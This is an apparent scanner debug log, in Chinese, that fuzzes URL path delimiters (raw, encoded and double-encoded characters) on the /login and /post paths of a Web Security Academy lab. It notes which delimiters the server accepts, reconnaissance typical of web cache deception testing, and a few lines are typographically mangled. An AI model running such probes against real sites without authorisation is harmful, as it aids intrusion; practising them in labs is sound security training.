2025/10/23 20:45:33 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%3Eaa
2025/10/23 20:45:34 [DEBUG] 正在测试分隔符 (来自字典): ‘?’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login?aa
2025/10/23 20:45:34 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%3Faa
2025/10/23 20:45:34 [DEBUG] 正在测试分隔符 (来自字典): ‘@’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login@aa
2025/10/23 20:45:34 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%40’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%40aa
2025/10/23 20:45:34 [DEBUG] 正在测试分隔符 (来自字典): ‘[‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login[aa
2025/10/23 20:45:34 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%5Baa
2025/10/23 20:45:35 [DEBUG] 正在测试分隔符 (来自字典): ‘\’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login\aa
2025/10/23 20:45:35 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%5Caa
2025/10/23 20:45:35 [DEBUG] 正在测试分隔符 (来自字典): ‘]’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login]aa
2025/10/23 20:45:35 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%5Daa
2025/10/23 20:45:35 [DEBUG] 正在测试分隔符 (来自字典): ‘^’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login^aa
2025/10/23 20:45:36 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%5Eaa
2025/10/23 20:45:36 [DEBUG] 正在测试分隔符 (来自字典): ‘‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login_aa
2025/10/23 20:45:36 [DEBUG] 正在测试分隔符 (来自字典): ‘', URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/loginaa
2025/10/23 20:45:36 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%60’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%60aa
2025/10/23 20:45:36 [DEBUG] 正在测试分隔符 (来自字典): ‘{‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login{aa
2025/10/23 20:45:36 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%7B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%7Baa
2025/10/23 20:45:37 [DEBUG] 正在测试分隔符 (来自字典): ‘|’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login|aa
2025/10/23 20:45:37 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%7C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%7Caa
2025/10/23 20:45:37 [DEBUG] 正在测试分隔符 (来自字典): ‘}’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login}aa
2025/10/23 20:45:37 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%7D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%7Daa
2025/10/23 20:45:37 [DEBUG] 正在测试分隔符 (来自字典): ‘~’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login~aa
2025/10/23 20:45:37 [DEBUG] 正在测试分隔符 (来自字典): ‘%21’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%21aa
2025/10/23 20:45:38 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2521’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2521aa
2025/10/23 20:45:38 [DEBUG] 正在测试分隔符 (来自字典): ‘%22’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%22aa
2025/10/23 20:45:38 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2522’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2522aa
2025/10/23 20:45:38 [DEBUG] 正在测试分隔符 (来自字典): ‘%23’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%23aa
2025/10/23 20:45:38 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2523’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2523aa
2025/10/23 20:45:39 [DEBUG] 正在测试分隔符 (来自字典): ‘%24’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%24aa
2025/10/23 20:45:39 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2524’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2524aa
2025/10/23 20:45:39 [DEBUG] 正在测试分隔符 (来自字典): ‘%25’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%25aa
2025/10/23 20:45:39 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2525’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2525aa
2025/10/23 20:45:39 [DEBUG] 正在测试分隔符 (来自字典): ‘%26’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%26aa
2025/10/23 20:45:39 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2526’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2526aa
2025/10/23 20:45:40 [DEBUG] 正在测试分隔符 (来自字典): ‘%27’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%27aa
2025/10/23 20:45:40 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2527’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2527aa
2025/10/23 20:45:40 [DEBUG] 正在测试分隔符 (来自字典): ‘%28’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%28aa
2025/10/23 20:45:40 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2528’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2528aa
2025/10/23 20:45:40 [DEBUG] 正在测试分隔符 (来自字典): ‘%29’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%29aa
2025/10/23 20:45:41 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2529’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2529aa
2025/10/23 20:45:41 [DEBUG] 正在测试分隔符 (来自字典): ‘%2A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2Aaa
2025/10/23 20:45:41 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%252Aaa
2025/10/23 20:45:41 [DEBUG] 正在测试分隔符 (来自字典): ‘%2B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2Baa
2025/10/23 20:45:41 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%252Baa
2025/10/23 20:45:41 [DEBUG] 正在测试分隔符 (来自字典): ‘%2C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2Caa
2025/10/23 20:45:42 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%252Caa
2025/10/23 20:45:42 [DEBUG] 正在测试分隔符 (来自字典): ‘%2D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2Daa
2025/10/23 20:45:42 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%252Daa
2025/10/23 20:45:42 [DEBUG] 正在测试分隔符 (来自字典): ‘%2E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2Eaa
2025/10/23 20:45:42 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%252Eaa
2025/10/23 20:45:43 [DEBUG] 正在测试分隔符 (来自字典): ‘%2F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2Faa
2025/10/23 20:45:43 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%252Faa
2025/10/23 20:45:43 [DEBUG] 正在测试分隔符 (来自字典): ‘%3A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%3Aaa
2025/10/23 20:45:43 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%253Aaa
2025/10/23 20:45:43 [DEBUG] 正在测试分隔符 (来自字典): ‘%3B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%3Baa
2025/10/23 20:45:43 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%253Baa
2025/10/23 20:45:44 [DEBUG] 正在测试分隔符 (来自字典): ‘%3C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%3Caa
2025/10/23 20:45:44 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%253Caa
2025/10/23 20:45:44 [DEBUG] 正在测试分隔符 (来自字典): ‘%3D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%3Daa
2025/10/23 20:45:44 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%253Daa
2025/10/23 20:45:44 [DEBUG] 正在测试分隔符 (来自字典): ‘%3E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%3Eaa
2025/10/23 20:45:44 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%253Eaa
2025/10/23 20:45:45 [DEBUG] 正在测试分隔符 (来自字典): ‘%3F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%3Faa
2025/10/23 20:45:45 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%253Faa
2025/10/23 20:45:45 [DEBUG] 正在测试分隔符 (来自字典): ‘%40’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%40aa
2025/10/23 20:45:45 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2540’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2540aa
2025/10/23 20:45:45 [DEBUG] 正在测试分隔符 (来自字典): ‘%5B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%5Baa
2025/10/23 20:45:46 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%255Baa
2025/10/23 20:45:46 [DEBUG] 正在测试分隔符 (来自字典): ‘%5C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%5Caa
2025/10/23 20:45:46 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%255Caa
2025/10/23 20:45:46 [DEBUG] 正在测试分隔符 (来自字典): ‘%5D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%5Daa
2025/10/23 20:45:46 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%255Daa
2025/10/23 20:45:46 [DEBUG] 正在测试分隔符 (来自字典): ‘%5E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%5Eaa
2025/10/23 20:45:47 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%255Eaa
2025/10/23 20:45:47 [DEBUG] 正在测试分隔符 (来自字典): ‘%5F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%5Faa
2025/10/23 20:45:47 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%255Faa
2025/10/23 20:45:47 [DEBUG] 正在测试分隔符 (来自字典): ‘%60’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%60aa
2025/10/23 20:45:47 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2560’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2560aa
2025/10/23 20:45:48 [DEBUG] 正在测试分隔符 (来自字典): ‘%7B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%7Baa
2025/10/23 20:45:48 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%257Baa
2025/10/23 20:45:48 [DEBUG] 正在测试分隔符 (来自字典): ‘%7C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%7Caa
2025/10/23 20:45:48 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%257Caa
2025/10/23 20:45:48 [DEBUG] 正在测试分隔符 (来自字典): ‘%7D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%7Daa
2025/10/23 20:45:48 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%257Daa
2025/10/23 20:45:49 [DEBUG] 正在测试分隔符 (来自字典): ‘%7E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%7Eaa
2025/10/23 20:45:49 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%257Eaa
2025/10/23 20:45:49 [DEBUG] 正在为分隔符检测选择基础URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post
2025/10/23 20:45:49 [DEBUG] 正在测试分隔符 (来自字典): ‘!’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post!aa
2025/10/23 20:45:49 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%21’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%21aa
2025/10/23 20:45:50 [DEBUG] 正在测试分隔符 (来自字典): ‘“‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post"aa
2025/10/23 20:45:50 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%22’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%22aa
2025/10/23 20:45:50 [DEBUG] 正在测试分隔符 (来自字典): ‘#’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post#aa
2025/10/23 20:45:50 [DEBUG] 为URL https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post 找到分隔符 (来自字典): ‘#’
2025/10/23 20:45:50 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%23’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%23aa
2025/10/23 20:45:50 [DEBUG] 正在测试分隔符 (来自字典): ‘$’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post$aa
2025/10/23 20:45:50 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%24’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%24aa
2025/10/23 20:45:51 [DEBUG] 正在测试分隔符 (来自字典): ‘%’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%aa
2025/10/23 20:45:51 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%25’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%25aa
2025/10/23 20:45:51 [DEBUG] 正在测试分隔符 (来自字典): ‘&’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post&aa
2025/10/23 20:45:51 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%26’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%26aa
2025/10/23 20:45:51 [DEBUG] 正在测试分隔符 (来自字典): ‘’’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post'aa
2025/10/23 20:45:52 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%27’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%27aa
2025/10/23 20:45:52 [DEBUG] 正在测试分隔符 (来自字典): ‘(‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post(aa
2025/10/23 20:45:52 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%28’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%28aa
2025/10/23 20:45:52 [DEBUG] 正在测试分隔符 (来自字典): ‘)’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post)aa
2025/10/23 20:45:52 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%29’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%29aa
2025/10/23 20:45:52 [DEBUG] 正在测试分隔符 (来自字典): ‘‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/postaa
2025/10/23 20:45:53 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2Aaa
2025/10/23 20:45:53 [DEBUG] 正在测试分隔符 (来自字典): ‘+’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post+aa
2025/10/23 20:45:53 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2Baa
2025/10/23 20:45:53 [DEBUG] 正在测试分隔符 (来自字典): ‘,’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post,aa
2025/10/23 20:45:53 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2Caa
2025/10/23 20:45:53 [DEBUG] 正在测试分隔符 (来自字典): ‘-‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post-aa
2025/10/23 20:45:54 [DEBUG] 正在测试分隔符 (来自字典): ‘.’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post.aa
2025/10/23 20:45:54 [DEBUG] 正在测试分隔符 (来自字典): ‘/‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post/aa
2025/10/23 20:45:54 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2Faa
2025/10/23 20:45:54 [DEBUG] 正在测试分隔符 (来自字典): ‘:’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post:aa
2025/10/23 20:45:54 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%3Aaa
2025/10/23 20:45:55 [DEBUG] 正在测试分隔符 (来自字典): ‘;’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post;aa
2025/10/23 20:45:55 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%3Baa
2025/10/23 20:45:55 [DEBUG] 正在测试分隔符 (来自字典): ‘<’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post', URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post>aa
2025/10/23 20:45:56 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%3Eaa
2025/10/23 20:45:56 [DEBUG] 正在测试分隔符 (来自字典): ‘?’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post?aa
2025/10/23 20:45:56 [DEBUG] 为URL https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post 找到分隔符 (来自字典): ‘?’
2025/10/23 20:45:56 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%3Faa
2025/10/23 20:45:56 [DEBUG] 正在测试分隔符 (来自字典): ‘@’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post@aa
2025/10/23 20:45:57 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%40’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%40aa
2025/10/23 20:45:57 [DEBUG] 正在测试分隔符 (来自字典): ‘[‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post[aa
2025/10/23 20:45:57 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%5Baa
2025/10/23 20:45:57 [DEBUG] 正在测试分隔符 (来自字典): ‘\’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post\aa
2025/10/23 20:45:57 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%5Caa
2025/10/23 20:45:57 [DEBUG] 正在测试分隔符 (来自字典): ‘]’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post]aa
2025/10/23 20:45:58 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%5Daa
2025/10/23 20:45:58 [DEBUG] 正在测试分隔符 (来自字典): ‘^’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post^aa
2025/10/23 20:45:58 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%5Eaa
2025/10/23 20:45:58 [DEBUG] 正在测试分隔符 (来自字典): ‘_’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post_aa
2025/10/23 20:45:58 [DEBUG] 正在测试分隔符 (来自字典): ‘', URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/postaa
2025/10/23 20:45:58 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%60’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%60aa
2025/10/23 20:45:59 [DEBUG] 正在测试分隔符 (来自字典): ‘{‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post{aa
2025/10/23 20:45:59 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%7B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%7Baa
2025/10/23 20:45:59 [DEBUG] 正在测试分隔符 (来自字典): ‘|’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post|aa
2025/10/23 20:45:59 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%7C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%7Caa
2025/10/23 20:45:59 [DEBUG] 正在测试分隔符 (来自字典): ‘}’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post}aa
2025/10/23 20:46:00 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%7D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%7Daa
2025/10/23 20:46:00 [DEBUG] 正在测试分隔符 (来自字典): ‘~’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post~aa
2025/10/23 20:46:00 [DEBUG] 正在测试分隔符 (来自字典): ‘%21’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%21aa
2025/10/23 20:46:00 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2521’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2521aa
2025/10/23 20:46:00 [DEBUG] 正在测试分隔符 (来自字典): ‘%22’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%22aa
2025/10/23 20:46:00 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2522’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2522aa
2025/10/23 20:46:01 [DEBUG] 正在测试分隔符 (来自字典): ‘%23’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%23aa
2025/10/23 20:46:01 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2523’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2523aa
2025/10/23 20:46:01 [DEBUG] 正在测试分隔符 (来自字典): ‘%24’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%24aa
2025/10/23 20:46:01 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2524’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2524aa
2025/10/23 20:46:01 [DEBUG] 正在测试分隔符 (来自字典): ‘%25’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%25aa
2025/10/23 20:46:02 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2525’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2525aa
2025/10/23 20:46:02 [DEBUG] 正在测试分隔符 (来自字典): ‘%26’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%26aa
2025/10/23 20:46:02 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2526’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2526aa
2025/10/23 20:46:02 [DEBUG] 正在测试分隔符 (来自字典): ‘%27’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%27aa
2025/10/23 20:46:02 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2527’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2527aa
2025/10/23 20:46:03 [DEBUG] 正在测试分隔符 (来自字典): ‘%28’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%28aa
2025/10/23 20:46:03 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2528’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2528aa
2025/10/23 20:46:03 [DEBUG] 正在测试分隔符 (来自字典): ‘%29’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%29aa
2025/10/23 20:46:03 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2529’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2529aa
2025/10/23 20:46:03 [DEBUG] 正在测试分隔符 (来自字典): ‘%2A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2Aaa
2025/10/23 20:46:04 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%252Aaa
2025/10/23 20:46:04 [DEBUG] 正在测试分隔符 (来自字典): ‘%2B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2Baa
2025/10/23 20:46:04 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%252Baa
2025/10/23 20:46:04 [DEBUG] 正在测试分隔符 (来自字典): ‘%2C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2Caa
2025/10/23 20:46:04 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%252Caa
2025/10/23 20:46:04 [DEBUG] 正在测试分隔符 (来自字典): ‘%2D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2Daa
